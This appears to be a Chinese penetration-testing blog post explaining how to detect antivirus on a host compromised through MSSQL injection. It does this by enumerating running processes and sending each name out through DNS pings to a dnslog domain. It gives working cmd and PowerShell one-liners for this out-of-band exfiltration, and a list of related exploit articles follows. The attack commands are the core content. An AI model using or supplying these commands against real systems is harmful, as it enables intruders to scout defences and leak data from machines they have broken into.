如何利用dnslog探测目标主机杀软

简介: 如何利用dnslog探测目标主机杀软


0x01 前言

2021年7月某天,团队@Twe1ve老哥遇到这样一个场景:MSSQL高权限注入,目标主机不出网,想利用dnslog探测这台主机中是否存在杀软?


当时想都没想,就回了句难搞!其实还是能实现的,最后和他一起测试出了两种方法。


0x02 利用cmdshell for循环实现

两种方法原理一样,都是先获取目标主机的进程,然后通过for、ForEach循环Ping dnslog外带出来。

    for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul


    0x03 利用powershell foreach循环实现

    以下命令是@Twe1ve老哥整出来的,加了个去重,但是在实际测试过程中发现好像并没有起到去重效果。最后别忘了删除一下1.txt文件!

      powershell -c "Get-Process | select processname > 1.txt"
      powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.***fks2j.ns.dns3.cf.'} }"


      注:dnslog.cn及其他大多数dnslog平台的前端仅能展示最近十条记录,想要获取完整记录可以使用ceye.iodns.xn--9tr.com,用xn--9tr在获取记录时请打开F12看请求。

      相关文章
      |
      SQL Web App开发 XML
      广联达OA漏洞合集(信息泄露+SQL注入+文件上传)
      广联达Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账号密码登录后台,造成其他影响。
      2316 1
      |
      域名解析 缓存 网络协议
      Let's Encrypt 配置 HTTPS 免费泛域名证书
      Let's Encrypt 配置 HTTPS 免费泛域名证书
      3177 0
      |
      运维 Linux Shell
      |
      缓存 安全 开发工具
      Android 解决bug:Android studio 运行、编译项目时导致电脑死机
      Android 解决bug:Android studio 运行、编译项目时导致电脑死机
      1242 0
      |
      数据安全/隐私保护
      雾锁王国怎么修改服务器名称和密码
      本文指导如何在阿里云控制台修改雾锁王国的服务器名称和密码。
      827 0
      |
      7月前
      |
      安全 Java API
      什么是用于 REST API 的 Bearer Token以及如何通过代码和工具进行调试
      Bearer Token 是一种基于 OAuth 2.0 的身份验证机制,广泛应用于 REST API 的授权访问中。它通过在 HTTP 请求头中传递令牌,确保用户凭据安全传输并验证。本文深入解析了 Bearer Token 的概念、实现步骤及调试方法,包括其无状态特性、灵活性与安全性优势。同时,提供了 Java 实现示例和使用 Apipost、cURL 等工具测试的实践指导,帮助开发者掌握这一核心技能,保障 API 系统的安全与高效运行。
      |
      8月前
      |
      SQL JavaScript 前端开发
      Vue实现动态数据透视表(交叉表)
      Vue实现动态数据透视表(交叉表)
      398 13
      |
      JavaScript 算法 前端开发
      JS算法必备之Array常用操作方法
      这篇文章详细介绍了JavaScript中数组的创建、检测、转换、排序、操作方法以及迭代方法等,提供了数组操作的全面指南。
      373 2
      JS算法必备之Array常用操作方法
      |
      安全 Linux API
      ​Apache Solr未授权上传漏洞复现及验证POC编写
      ​Apache Solr未授权上传漏洞复现及验证POC编写
      |
      SQL 关系型数据库 MySQL
      利用 SQL 注入识别数据库方法总结
      利用 SQL 注入识别数据库方法总结